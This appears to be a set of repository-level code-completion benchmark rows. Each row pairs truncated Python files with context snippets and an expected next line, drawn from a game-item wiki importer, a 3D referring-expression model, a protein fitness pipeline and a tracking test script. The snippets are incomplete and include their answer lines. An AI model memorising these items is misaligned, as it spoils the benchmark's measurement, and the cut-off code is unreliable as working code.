is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
|
def iter_wiki_query(**cargo_params: dict[str, str]) -> Generator[dict, None, None]:
page_size = 500
offset = 0
session = LoggedRequestsSession()
while True:
res = session.get(
'https://www.poewiki.net/w/api.php',
params={
'action': 'cargoquery',
'format': 'json',
'offset': offset,
'limit': page_size,
**cargo_params,
},
)
assert res.status_code == http.HTTPStatus.OK
res_decoded = res.json()
try:
result_page = res_decoded['cargoquery']
except KeyError:
# unexpected message format, probably the query was bad.
# print full response for debugging.
pprint.pprint(res_decoded)
raise
result_page_len = len(result_page)
yield from result_page
# partial page indicates that there won't be a next page; stop crawling
if result_page_len < page_size:
break
offset += result_page_len
WIKI_ITEM_BLACKLIST: set[str] = { # items to completely ignore when importing from wiki (e.g. test data)
'Тест',
'Test',
'{{subst:PAGENAME}}',
"Booby Lady's Gloves",
'His Judgement', # seems to be in game files, but smells fishy
}
KNOWN_NINJA_UNLISTED_NAMES: set[str] = { # item names that are never listed on ninja
# non-armour/weapon base types
'Contract: Bunker',
'Contract: Laboratory',
'Contract: Mansion',
'Contract: Prohibited Library',
'Contract: Records Office',
'Contract: Repository',
"Contract: Smuggler's Den",
'Contract: Tunnels',
'Contract: Underbelly',
'Blueprint: Bunker',
'Blueprint: Laboratory',
'Blueprint: Mansion',
'Blueprint: Prohibited Library',
'Blueprint: Records Office',
'Blueprint: Repository',
"Blueprint: Smuggler's Den",
'Blueprint: Tunnels',
'Blueprint: Underbelly',
'Amethyst Flask',
'Aquamarine Flask',
'Basalt Flask',
'Bismuth Flask',
'Corundum Flask',
'Diamond Flask',
'Gold Flask',
'Granite Flask',
'Iron Flask',
'Jade Flask',
'Quartz Flask',
'Quicksilver Flask',
'Ruby Flask',
'Sapphire Flask',
'Silver Flask',
'Stibnite Flask',
'Sulphur Flask',
'Topaz Flask',
'Colossal Life Flask',
'Divine Life Flask',
'Eternal Life Flask',
'Giant Life Flask',
'Grand Life Flask',
'Greater Life Flask',
'Hallowed Life Flask',
'Large Life Flask',
'Medium Life Flask',
'Sacred Life Flask',
'Sanctified Life Flask',
'Small Life Flask',
'Colossal Mana Flask',
'Divine Mana Flask',
'Eternal Mana Flask',
'Giant Mana Flask',
'Grand Mana Flask',
'Greater Mana Flask',
'Hallowed Mana Flask',
'Large Mana Flask',
'Medium Mana Flask',
'Sacred Mana Flask',
'Sanctified Mana Flask',
'Small Mana Flask',
'Colossal Hybrid Flask',
'Hallowed Hybrid Flask',
'Large Hybrid Flask',
'Medium Hybrid Flask',
'Sacred Hybrid Flask',
'Small Hybrid Flask',
'Candlestick Relic',
'Censer Relic',
'Coffer Relic',
'Papyrus Relic',
'Processional Relic',
'Tome Relic',
'Urn Relic',
'Large Cluster Jewel',
'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
| display_text = name if ninja_category is not NinjaCategory.UNIQUE_MAPS else f'{name} {base_item}' | 1 | 2023-10-27 11:33:43+00:00 | 4k |
ATR-DBI/CityRefer | models/refnet.py | [
{
"identifier": "MultiHeadAttention",
"path": "models/transformer.py",
"snippet": "class MultiHeadAttention(nn.Module):\n '''\n Multi-head attention layer with Dropout and Layer Normalization.\n '''\n\n def __init__(self, d_model, d_k, d_v, h, dropout=.1, identity_map_reordering=False, can_be_stateful=False,\n attention_module=None, attention_module_kwargs=None):\n super(MultiHeadAttention, self).__init__()\n self.identity_map_reordering = identity_map_reordering\n if attention_module is not None:\n if attention_module_kwargs is not None:\n self.attention = attention_module(d_model=d_model, d_k=d_k, d_v=d_v, h=h, **attention_module_kwargs)\n else:\n self.attention = attention_module(d_model=d_model, d_k=d_k, d_v=d_v, h=h, m = 20)\n else:\n self.attention = ScaledDotProductAttention(d_model=d_model, d_k=d_k, d_v=d_v, h=h)\n self.dropout = nn.Dropout(p=dropout)\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.can_be_stateful = can_be_stateful\n if self.can_be_stateful:\n self.register_state('running_keys', torch.zeros((0, d_model)))\n self.register_state('running_values', torch.zeros((0, d_model)))\n\n def forward(self, queries, keys, values, attention_mask=None, attention_weights=None, way='mul'):\n if self.can_be_stateful and self._is_stateful:\n self.running_keys = torch.cat([self.running_keys, keys], 1)\n keys = self.running_keys\n\n self.running_values = torch.cat([self.running_values, values], 1)\n values = self.running_values\n\n if self.identity_map_reordering:\n q_norm = self.layer_norm(queries)\n k_norm = self.layer_norm(keys)\n v_norm = self.layer_norm(values)\n out = self.attention(q_norm, k_norm, v_norm, attention_mask, attention_weights, way)\n out = queries + self.dropout(torch.relu(out))\n else:\n out = self.attention(queries, keys, values, attention_mask, attention_weights, way)\n out = self.dropout(out)\n out = self.layer_norm(queries + out)\n return out\n\n def forward_faster(self, queries, keys, values, attention_pos, attention_weights, way):\n if self.can_be_stateful and self._is_stateful:\n self.running_keys = torch.cat([self.running_keys, keys], 1)\n keys = self.running_keys\n\n self.running_values = torch.cat([self.running_values, values], 1)\n values = self.running_values\n\n if self.identity_map_reordering:\n q_norm = self.layer_norm(queries)\n k_norm = self.layer_norm(keys)\n v_norm = self.layer_norm(values)\n out = self.attention.forward_faster(q_norm, k_norm, v_norm, attention_pos, attention_weights, way)\n out = queries + self.dropout(torch.relu(out))\n else:\n out = self.attention.forward_faster(queries, keys, values, attention_pos, attention_weights, way)\n out = self.dropout(out)\n out = self.layer_norm(queries + out)\n return out"
},
{
"identifier": "SparseConvEncoder",
"path": "models/basic_blocks.py",
"snippet": "class SparseConvEncoder(nn.Module):\n def __init__(self, input_dim):\n super().__init__()\n\n self.stem = nn.Sequential(\n BasicConvolutionBlock(input_dim, 32, 3)\n )\n\n self.stage1 = nn.Sequential(\n BasicConvolutionBlock(32, 64, ks=2, stride=2),\n ResidualBlock(64, 64, 3),\n )\n\n self.stage2 = nn.Sequential(\n BasicConvolutionBlock(64, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n self.stage3 = nn.Sequential(\n BasicConvolutionBlock(128, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n self.stage4 = nn.Sequential(\n BasicConvolutionBlock(128, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n\n def forward(self, x):\n x = self.stem(x)\n x = self.stage1(x)\n x = self.stage2(x)\n x = self.stage3(x)\n x = self.stage4(x)\n\n return x"
},
{
"identifier": "LandLangModule",
"path": "models/landlang_module.py",
"snippet": "class LandLangModule(nn.Module):\n def __init__(self, num_object_class, vocab_size, use_lang_classifier=True, use_bidir=False, \n embed_dim=256, hidden_size=256, max_num_landmark=128, padding_idx=0):\n super().__init__() \n\n self.num_object_class = num_object_class\n self.use_lang_classifier = use_lang_classifier\n self.use_bidir = use_bidir\n self.max_num_landmark = max_num_landmark\n self.word_embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=padding_idx) #, **factory_kwargs) \n \n self.gru = nn.GRU(\n input_size=embed_dim,\n hidden_size=hidden_size,\n batch_first=True,\n bidirectional=self.use_bidir\n )\n \n lang_size = hidden_size * 2 if self.use_bidir else hidden_size\n # language classifier\n if use_lang_classifier:\n self.lang_cls = nn.Sequential(\n nn.Linear(lang_size, num_object_class),\n nn.Dropout()\n )\n\n def forward(self, data_dict):\n \"\"\"\n encode the input descriptions\n \"\"\"\n input_ids = data_dict[\"landmark_tokens\"]\n word_embs = self.word_embeddings(input_ids)\n landmark_tokens_len = data_dict['landmark_tokens_mask'].sum(axis=1).long().cpu()\n lang_feat = pack_padded_sequence(word_embs, landmark_tokens_len, batch_first=True, enforce_sorted=False)\n \n # encode description\n _, lang_last = self.gru(lang_feat)\n lang_last = lang_last.permute(1, 0, 2).contiguous().flatten(start_dim=1) # batch_size, hidden_size * num_dir\n\n cursor = 0\n landmark_name_feats = []\n for num_landmark in data_dict['landmark_len'].long().cpu():\n landmark_name_feat = lang_last[cursor:cursor+num_landmark]\n landmark_name_feats.append(landmark_name_feat)\n cursor += num_landmark\n landmark_name_feats = pad_sequence(landmark_name_feats, batch_first=True)\n \n # store the encoded language features\n data_dict[\"landmark_name_feats\"] = landmark_name_feats # B, max_landmark_len, hidden_size\n\n return data_dict\n\n def length_to_mask(self, length, max_len=None, dtype=None):\n \"\"\"length: B.\n return B x max_len.\n If max_len is None, then max of length will be used.\n \"\"\"\n assert len(length.shape) == 1, \"Length shape should be 1 dimensional.\"\n max_len = max_len or length.max().item()\n mask = torch.arange(max_len, device=length.device, dtype=length.dtype).expand(\n len(length), max_len\n ) < length.unsqueeze(1)\n if dtype is not None:\n mask = torch.as_tensor(mask, dtype=dtype, device=length.device)\n return mask"
}
] | import random
import torch
import torch.nn as nn
import torchsparse.nn as spnn
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchsparse.utils.collate import sparse_collate
from models.transformer import MultiHeadAttention
from models.basic_blocks import SparseConvEncoder
from models.landlang_module import LandLangModule | 2,012 |
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone
|
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone | self.sparse_conv = SparseConvEncoder(input_feature_dim) # self.input_feature_dim = 3 -> 128 | 1 | 2023-10-25 10:02:28+00:00 | 4k |
OATML-Markslab/ProteinNPT | baselines/data_processing.py | [
{
"identifier": "slice_sequences",
"path": "utils/data_utils.py",
"snippet": "def slice_sequences(list_mutant_mutated_seq_pairs, max_positions=1024, method=\"rolling\", rolling_overlap=100, eval_mode=True, batch_target_labels=None, batch_masked_targets=None, target_names=None, start_idx=1, num_extra_tokens=1):\n \"\"\"\n rolling: creates overlapping sequence chunks of length args.max_positions - 1 (minus 1 to allow the BOS token addition)\n center: centers sequence slice around mutation\n left: selects the first (args.max_positions - 1) tokens in the sequence\n batch_target_labels are needed in eval_mode with rolling as we do target duplication for the different windows.\n Assumption: all input sequences are of same length.\n num_extra_tokens: 1 is just BOS added (eg., ESM); 2 if BOS and EOS added (eg., Tranception)\n \"\"\"\n mutant_mutated_seqs = list(zip(*list_mutant_mutated_seq_pairs))\n raw_sequence_length = len(mutant_mutated_seqs[1][0]) # length of first sequence\n all_mutants = mutant_mutated_seqs[0]\n all_mutated_seqs = mutant_mutated_seqs[1]\n scoring_optimal_window = None\n if method==\"center\":\n mutations_barycenters = [int(np.array([ int(mutation[1:-1]) - start_idx for mutation in mutant.split(':')]).mean()) for mutant in all_mutants]\n scoring_optimal_window = [get_optimal_window(x, raw_sequence_length, max_positions - num_extra_tokens) for x in mutations_barycenters] #Removing 1 from args.max_positions to allow subsequent addition of BOS token\n sliced_mutated_seqs = [all_mutated_seqs[index][scoring_optimal_window[index][0]:scoring_optimal_window[index][1]] for index in range(len(all_mutated_seqs))]\n list_mutant_mutated_seq_pairs = list(zip(all_mutants,sliced_mutated_seqs))\n elif method==\"left\":\n sliced_mutated_seqs = [all_mutated_seqs[index][0:max_positions - num_extra_tokens] for index in range(len(all_mutated_seqs))] #minus 1 to keep room for BOS token\n list_mutant_mutated_seq_pairs = list(zip(all_mutants,sliced_mutated_seqs))\n scoring_optimal_window = [(0, max_positions - 1)] * len(all_mutated_seqs)\n else:\n print(\"Sequence slicing method not recognized\")\n sys.exit(0)\n if batch_masked_targets is not None: #Protein NPT output\n return list_mutant_mutated_seq_pairs, batch_target_labels, batch_masked_targets, scoring_optimal_window\n else: #Baseline output\n return list_mutant_mutated_seq_pairs, batch_target_labels, scoring_optimal_window"
},
{
"identifier": "get_indices_retrieved_embeddings",
"path": "utils/data_utils.py",
"snippet": "def get_indices_retrieved_embeddings(batch, embeddings_dict_location, number_of_mutated_seqs_to_score=None):\n batch_mutants, batch_sequences = zip(*batch['mutant_mutated_seq_pairs'])\n with h5py.File(embeddings_dict_location, 'r') as h5f:\n num_all_embeddings = len(h5f['mutants'])\n list_mutants = [x.decode('utf-8') for x in h5f['mutants'][:]]\n mutant_indices = range(num_all_embeddings)\n mutants_embeddings_dict = {'mutants': list_mutants, 'mutant_index': mutant_indices}\n mutants_embeddings_df = pd.DataFrame.from_dict(mutants_embeddings_dict, orient='columns')\n if number_of_mutated_seqs_to_score is not None:\n batch_mutants = batch_mutants[:number_of_mutated_seqs_to_score]\n batch_mutants_df = pd.DataFrame(batch_mutants, columns=['mutants'])\n intersection = pd.merge(batch_mutants_df, mutants_embeddings_df, how='inner', on='mutants')\n return np.array(intersection['mutant_index'].values)"
},
{
"identifier": "weighted_sample_MSA",
"path": "utils/msa_utils.py",
"snippet": "def weighted_sample_MSA(MSA_all_sequences, MSA_non_ref_sequences_weights, number_sampled_MSA_sequences):\n \"\"\"\n We always enforce the first sequence in the MSA to be the refence sequence.\n \"\"\"\n msa = [MSA_all_sequences[0]]\n msa.extend(random.choices(MSA_all_sequences[1:], weights=MSA_non_ref_sequences_weights, k=number_sampled_MSA_sequences-1))\n msa = [(desc, seq.upper()) for desc, seq in msa]\n return msa"
}
] | import sys
import numpy as np
import h5py
import torch
from collections import defaultdict
from utils.data_utils import slice_sequences, get_indices_retrieved_embeddings
from utils.msa_utils import weighted_sample_MSA | 1,663 |
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None:
|
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None: | model.MSA_sample_sequences = weighted_sample_MSA( | 2 | 2023-10-28 11:41:05+00:00 | 4k |
dyhBUPT/iKUN | test.py | [
{
"identifier": "opt",
"path": "opts.py",
"snippet": "class opts:\n def __init__(self):\n def parse(self, args=''):"
},
{
"identifier": "get_model",
"path": "model.py",
"snippet": "def get_model(opt, name='Model'):\n model = eval(name)(opt)\n model.cuda()\n model = nn.DataParallel(model)\n return model"
},
{
"identifier": "get_dataloader",
"path": "dataloader.py",
"snippet": "def get_dataloader(mode, opt, dataset='RMOT_Dataset', show=False, **kwargs):\n dataset = eval(dataset)(mode, opt, **kwargs)\n if show:\n dataset.show_information()\n if mode == 'train':\n dataloader = DataLoader(\n dataset,\n batch_size=opt.train_bs,\n shuffle=True,\n drop_last=True,\n num_workers=opt.num_workers,\n )\n elif mode == 'test':\n dataloader = DataLoader(\n dataset,\n batch_size=opt.test_bs,\n shuffle=False,\n drop_last=False,\n num_workers=opt.num_workers,\n )\n return dataloader"
},
{
"identifier": "get_transform",
"path": "dataloader.py",
"snippet": "def get_transform(mode, opt, idx):\n if mode == 'train':\n return T.Compose([\n SquarePad(),\n T.RandomResizedCrop(\n opt.img_hw[idx],\n ratio=opt.random_crop_ratio\n ),\n T.ToTensor(),\n T.Normalize(opt.norm_mean, opt.norm_std),\n ])\n elif mode == 'test':\n return T.Compose([\n SquarePad(),\n T.Resize(opt.img_hw[idx]),\n T.ToTensor(),\n T.Normalize(opt.norm_mean, opt.norm_std),\n ])\n elif mode == 'unnorm':\n mean = opt.norm_mean\n std = opt.norm_std\n return T.Normalize(\n [-mean[i]/std[i] for i in range(3)],\n [1/std[i] for i in range(3)],\n )"
},
{
"identifier": "similarity_calibration",
"path": "similarity_calibration.py",
"snippet": "def similarity_calibration(TEXT_FEAT_DICT, CLS_DICT, a, b, tau):\n fn = lambda x: a * x + b\n\n cls_dict = deepcopy(CLS_DICT)\n FEATS = np.array([x['feature'] for x in TEXT_FEAT_DICT['train'].values()])\n PROBS = np.array([x['probability'] for x in TEXT_FEAT_DICT['train'].values()])\n\n for video, video_value in cls_dict.items():\n for obj_id, obj_value in video_value.items():\n for frame, frame_value in obj_value.items():\n for exp, exp_value in frame_value.items():\n exp_new = expression_conversion(exp)\n feat = np.array(TEXT_FEAT_DICT['test'][exp_new]['feature'])[None, :]\n sim = (feat @ FEATS.T)[0]\n sim = (sim - sim.min()) / (sim.max() - sim.min())\n weight = np.exp(tau * sim) / np.exp(tau * sim).sum()\n prob = (weight * PROBS).sum()\n new_exp_value = [\n x + fn(prob) for x in exp_value\n ]\n frame_value[exp] = new_exp_value\n\n return cls_dict"
}
] | import os
import json
import shutil
import numpy as np
import torch
import torch.nn.functional as F
import warnings
from tqdm import tqdm
from os.path import join, exists
from collections import defaultdict
from torch import nn
from torchvision.utils import save_image
from opts import opt
from utils import *
from model import get_model
from dataloader import get_dataloader, get_transform
from similarity_calibration import similarity_calibration | 2,691 | if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
给定`test_tracking`输出的结果,生成最终跟踪结果
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO:可删
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path):
|
warnings.filterwarnings('ignore')
# import `opts` first to set gpus
def test_accuracy_v1(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
images = data['cropped_images']
images = images.repeat_interleave(len(expressions), dim=0)
# forward
inputs = dict(
img=images.cuda(),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs).cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
imgs = un_norm(inputs['img'])
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
return PRECISION, RECALL
